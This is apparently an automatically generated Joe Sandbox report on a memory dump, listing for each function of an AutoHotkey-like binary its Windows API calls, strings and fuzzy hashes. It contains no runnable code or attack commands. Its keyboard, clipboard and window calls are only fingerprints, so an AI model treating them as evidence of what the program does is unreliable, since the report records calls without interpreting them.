Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: MessageThread$PostUnregister$CountCreateHookPeekPriorityQuitSleepTickUnhookWindows
String ID:
API String ID: 322160584-0
Opcode ID: 11e1329486923a82926bd81750934eda3eb73209840910a33a00ac3b782314d5
Instruction ID: e2b6105dee7064bc04fb2d9b053dd10b9d804a7b40032c76cf79c15ad6971674
Opcode Fuzzy Hash: 11e1329486923a82926bd81750934eda3eb73209840910a33a00ac3b782314d5
Instruction Fuzzy Hash: 8331D271606210AFC724CF69DD84A27FBE5AB94710F14863FE845973A2DA34EC84CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00483220, Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00483298
EnumChildWindows.USER32 ref: 004832D9
EnumChildWindows.USER32 ref: 00483305

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ChildEnumWindows$_wcsncpy
String ID:
API String ID: 1330499146-0
Opcode ID: d52bc6fbdedd7bcd98556feec11ecdc08cbefb5193fdfdc8a3e5f9091889e079
Instruction ID: 3097c33f5b4710be0bd5b558e7757a75fba4f9e633b3c12ab965be284a07ffe8
Opcode Fuzzy Hash: d52bc6fbdedd7bcd98556feec11ecdc08cbefb5193fdfdc8a3e5f9091889e079
Instruction Fuzzy Hash: 2E21A57164534596C334EF25DC416EFB3D8EF94B11F48492EED8882240EB7E9A49839E

Uniqueness

Uniqueness Score: -1.00%

Function 00475AA0, Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON

Download Yara Rule

APIs

IsMenu.USER32 ref: 00475AB4
GetMenu.USER32(?), ref: 00475AE0
DestroyMenu.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00475BB8), ref: 00475AF4

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Menu$Destroy
String ID:
API String ID: 3525833831-0
Opcode ID: aa427cbcca59625217476911eb7cba2fe997ce72a187e2ecc16d37a72289bd97
Instruction ID: f134ccd7feeff6f1275dfcb9bc95f86da73d6f62ca8e549fea2a8366171aa6c8
Opcode Fuzzy Hash: aa427cbcca59625217476911eb7cba2fe997ce72a187e2ecc16d37a72289bd97
Instruction Fuzzy Hash: D0315C72701A108BCB309F25D884AB7B7A4BB44764B55C66BE84D9F351D7B8FC01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00415870, Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 004158A5
GetTickCount.KERNEL32 ref: 004158CF
PeekMessageW.USER32 ref: 004158F2
GetTickCount.KERNEL32 ref: 0041591C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CountTick$MessagePeek__itow
String ID:
API String ID: 1851793280-0
Opcode ID: fbfec8a17d9b0820ef0958489cd35e9be7bcd05407efe3ffa70689888c86b20c
Instruction ID: a16feb329ae8a6455002b73f168a3ced830c123a3e9380f593128b07adf7c589
Opcode Fuzzy Hash: fbfec8a17d9b0820ef0958489cd35e9be7bcd05407efe3ffa70689888c86b20c
Instruction Fuzzy Hash: FF21FBB1A25300DBD310EB21EC41BEA37A5AB84725F48452BE4405B3D0E738AA88CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 0049B5A0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 97becb569c06cdeaad4e3b297c865f1ef82b5ab4e66d190656afecc87c082429
Instruction ID: 7324e9288a0eaa686524278fe58341c1dde2d1dd6629ad50eef2632ae4536f63
Opcode Fuzzy Hash: 97becb569c06cdeaad4e3b297c865f1ef82b5ab4e66d190656afecc87c082429
Instruction Fuzzy Hash: 0211E1B2501214AFDF202B61EE84B5B3FA4EBC0764F104236F941962A0CB78AC41CADE

Uniqueness

Uniqueness Score: -1.00%

Function 00476060, Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32(?,?), ref: 004760AE
GetObjectW.GDI32(?,00000018,?), ref: 004760C4
DeleteObject.GDI32(?), ref: 004760EC
DeleteObject.GDI32(?), ref: 004760F3

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Object$Delete$IconInfo
String ID:
API String ID: 507670407-0
Opcode ID: 7266f9f4c3dd8f405baa1db73c1f502ab6060669b63328046889d0fb68093194
Instruction ID: 26ff792f1627f643f7149c9ed8b48c5df8ef6469b64d9b6c4bdcf4d74f27bcec
Opcode Fuzzy Hash: 7266f9f4c3dd8f405baa1db73c1f502ab6060669b63328046889d0fb68093194
Instruction Fuzzy Hash: 311181713046429BD714DF2AC840AA7B7EABF84310B06C56EE80DC7350EB35ED02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0045A5D0, Relevance: 6.1, APIs: 4, Instructions: 61keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(?), ref: 0045A5E5

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: caeb19eef7fb0c4c5271a4ed93cad80f8f9a3780d79cc831cc3fc9c829b94af5
Instruction ID: 8af1ea63935a78347f2a5a58a8fa3aa407f43742b3695d9ca5329569b483d19d
Opcode Fuzzy Hash: caeb19eef7fb0c4c5271a4ed93cad80f8f9a3780d79cc831cc3fc9c829b94af5
Instruction Fuzzy Hash: D5116BB14400145ADF189B34A8797EA37D0F781703FCC0997F8854A193E53E815EFA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00483DA0, Relevance: 6.1, APIs: 4, Instructions: 60threadCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32 ref: 00483DD7
GetWindowThreadProcessId.USER32(?,?), ref: 00483DFF
GetWindowThreadProcessId.USER32(?,?), ref: 00483E12
GetClassNameW.USER32 ref: 00483E58

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$ProcessThread$ClassNameText
String ID:
API String ID: 3420357866-0
Opcode ID: cd6ba6ca3275f4ad2302d5634d91795f55af3370978ab623ecd935c3da169c63
Instruction ID: 2b7d4c4d018fc57d8e0c0933b57358e4227e2300302638febadd6def6c48aab3
Opcode Fuzzy Hash: cd6ba6ca3275f4ad2302d5634d91795f55af3370978ab623ecd935c3da169c63
Instruction Fuzzy Hash: E611B171104B419AD724AF39C840AFB77E5EF81B41F048D1DE49A87280EB39BA41C758

Uniqueness

Uniqueness Score: -1.00%

Function 00467E10, Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00467E3C
IsWindowVisible.USER32(?), ref: 00467E50
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,00000000,03211AA0,00475A8F,?), ref: 00467E72
RedrawWindow.USER32(?,00000000,00000000,00000501,?,?,00000000,03211AA0,00475A8F,?), ref: 00467E89

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window$MenuRedrawVisible
String ID:
API String ID: 1537645765-0
Opcode ID: 477971a27038aa8940a9fc6f74c62b78ebb839ed33f5968e4c48c1c1d8175764
Instruction ID: 3a59ece8cd9bb9b039d68a05ecfc36f6d741eb38f74ba8f962f79e5d9844ee0c
Opcode Fuzzy Hash: 477971a27038aa8940a9fc6f74c62b78ebb839ed33f5968e4c48c1c1d8175764
Instruction Fuzzy Hash: 0A01963A604220AFC210DF54ECC0F267765A78A714F14809AE24557362D772FC02CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD0, Relevance: 6.0, APIs: 4, Instructions: 45clipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(00000000,73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00404FEC
CloseClipboard.USER32(73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00404FF1
GlobalUnlock.KERNEL32(?,73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00405005
GlobalFree.KERNEL32 ref: 00405015

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Global$Unlock$ClipboardCloseFree
String ID:
API String ID: 1156981608-0
Opcode ID: abf68452e1ef4c74bf44685c7c497d1c77332b95564158a3018709aa95467440
Instruction ID: 5ba154bcce6b8e8cc86b935a7dec4bcfc97a94ba14dc25ad50b1fef4515293f0
Opcode Fuzzy Hash: abf68452e1ef4c74bf44685c7c497d1c77332b95564158a3018709aa95467440
Instruction Fuzzy Hash: 5B01C872600B049BC3309F5AD98482BF7E8FFE5711320C92FE59693A51DB79A8409F68

Uniqueness

Uniqueness Score: -1.00%

Function 00483E60, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00483FFE
EnumChildWindows.USER32 ref: 00484183

Strings

%s%u, xrefs: 004841F2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ChildEnumWindows__wcsicoll
String ID: %s%u
API String ID: 2617673624-679674701
Opcode ID: add3a832fd3070f12f4fdbdb81b9aafbeadcb41faf459291ab80fb80b8a7fbd0
Instruction ID: d9d11a9383682bbf2cfaf21b9600a99c367c23a4ccfd99aa586868719355be1b
Opcode Fuzzy Hash: add3a832fd3070f12f4fdbdb81b9aafbeadcb41faf459291ab80fb80b8a7fbd0
Instruction Fuzzy Hash: 93B1B4316001459ADB34FE15DC45BFF33A6EBA1755F04892BEE088B280E779DB8AC758

Uniqueness

Uniqueness Score: -1.00%

Function 004525E0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004525EC

Strings

pcre_callout, xrefs: 00452619

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CurrentThread
String ID: pcre_callout
API String ID: 2882836952-3968347005
Opcode ID: 1f050b0b3ac53b9c40639d2df8ce5156f18e5f09fd53d96221df83db78b70365
Instruction ID: ac6a73a2748d6a0be9506f126d2dd23c8941c863634ce0df96ae5b5d5b782aa3
Opcode Fuzzy Hash: 1f050b0b3ac53b9c40639d2df8ce5156f18e5f09fd53d96221df83db78b70365
Instruction Fuzzy Hash: A69156B4604701AFC324DF19C980A2BB7E5FB89314F10862EF9498B792D774EC45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00403B20: GetTickCount.KERNEL32 ref: 00403B52

GetTickCount.KERNEL32 ref: 00403388
_wcsncpy.LIBCMT ref: 004033FE

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

Timer, xrefs: 00403466

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AvailableClipboardCountFormatTick$_wcsncpy
String ID: Timer
API String ID: 1301760726-2870079774
Opcode ID: d7bd92263972ba15a3ffc6b05d173e7a7421f7a6b314214b8f3e31e05dbe6696
Instruction ID: 6a76866c6296d9bd35f008eb96c576d71ed6ca996de63abb385955c31e4edab6
Opcode Fuzzy Hash: d7bd92263972ba15a3ffc6b05d173e7a7421f7a6b314214b8f3e31e05dbe6696
Instruction Fuzzy Hash: F55131306043406BD731DF26D841B27BBE8AB41316F14897FE8852A6D1CB7CBA84CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 004363D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0043645A
GetTickCount.KERNEL32 ref: 004364B3

Strings

#If, xrefs: 00436507, 0043653B

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CountTick_wcsncpy
String ID: #If
API String ID: 2317306155-1075843466
Opcode ID: 24c3fd3bc287d5a075c1c64a044ce8a98b3a256cec08c3d0db8e29f98b5bb5d9
Instruction ID: c15ccdce554627f64d458bb5a925b9e2298c116f660b93114dec1a9c19f91367
Opcode Fuzzy Hash: 24c3fd3bc287d5a075c1c64a044ce8a98b3a256cec08c3d0db8e29f98b5bb5d9
Instruction Fuzzy Hash: 9F519170905242AFD310DF18E884A5ABBE0EB99314F04857FF989D73A1D734AD04CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004575A0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000105F), ref: 0045768F

Part of subcall function 004656D0: __wcsicoll.LIBCMT ref: 004656EC

SendMessageW.USER32(?,0000104B), ref: 004576EC

Strings

$%K, xrefs: 004575D1

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$__wcsicoll
String ID: $%K
API String ID: 2764284104-3388506065
Opcode ID: b678ac7918c0faa411100bc575beafbea3d2ed09c8cef1fa9aa311c089feeb5c
Instruction ID: 271b593673f5821c449a9b464a48227e54d919084041be944275091b043b8b4e
Opcode Fuzzy Hash: b678ac7918c0faa411100bc575beafbea3d2ed09c8cef1fa9aa311c089feeb5c
Instruction Fuzzy Hash: B741D2712043019FC710CF18E881B5BB7E5EB89325F10497EF9598B292E775E848CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00412050, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004120B3

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Strings

Hotstring max abbreviation length is 40., xrefs: 00412085
Out of memory., xrefs: 004120C9

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: Hotstring max abbreviation length is 40.$Out of memory.
API String ID: 501242067-4290233147
Opcode ID: 5b12c14da21fb58756a3552a552816f25616dd325bcbe9c676cf5ac42aa15f58
Instruction ID: d382907889bb48344e10b5a65e50902b12a52632c07aa2ba800ae033923bddb9
Opcode Fuzzy Hash: 5b12c14da21fb58756a3552a552816f25616dd325bcbe9c676cf5ac42aa15f58
Instruction Fuzzy Hash: 62419DB0908301ABD724DF29DD41BAB77A1FB88314F048A6FE549C7390EBB8D851CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00407456, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?,?,?,[s@,004075AC), ref: 0040754D

Strings

%u">, xrefs: 00407525
[s@, xrefs: 00407456

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: %u">$[s@
API String ID: 626452242-65436816
Opcode ID: 46967c544ef86fe97483c7162760ddf66119f16f159d498423168e2a2006fb0e
Instruction ID: 9fd73c8c01ba9f6bde0330cac288b5ad462910fbe4c4f0a5d5f0d6ca10a53f5d
Opcode Fuzzy Hash: 46967c544ef86fe97483c7162760ddf66119f16f159d498423168e2a2006fb0e
Instruction Fuzzy Hash: B6318632E04105ABDF14DFA4CC81AAF7B69EB45764F14813BE914B72C0D778BE41875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040691B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 0040698C

Strings

enabled, xrefs: 0040695E
disabled, xrefs: 00406974

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcstoui64
String ID: disabled$enabled
API String ID: 3882282163-1755556926
Opcode ID: 0437b3181699bb8092a25a007ffc5dcd190e7bcbb5acc9357388012ecab9f41c
Instruction ID: cca821e3e64a14915cb6fc811a0d1bac4fda99564fc1955f2768ada01c832a80
Opcode Fuzzy Hash: 0437b3181699bb8092a25a007ffc5dcd190e7bcbb5acc9357388012ecab9f41c
Instruction Fuzzy Hash: FD3114B1A042159BDB248F698040B3A7BA0AB41714F26C17FD087BF7C1E23DC9268B59

Uniqueness

Uniqueness Score: -1.00%

Function 004794B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(004AE8F8,?,03215110,?,?,?,?,?,?,00450FC9), ref: 00479545

Strings

call, xrefs: 00479565
@cM, xrefs: 00479510

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CurrentDirectory
String ID: @cM$call
API String ID: 1611563598-2628529064
Opcode ID: 1be77b9ed89d56087677b5337e07854c11674a9c9f4eeec723b406395e4980b3
Instruction ID: 2e5d8bf37de0f1624622178549ec1a29f046442de9d7c0dcec61b03ecd97a286
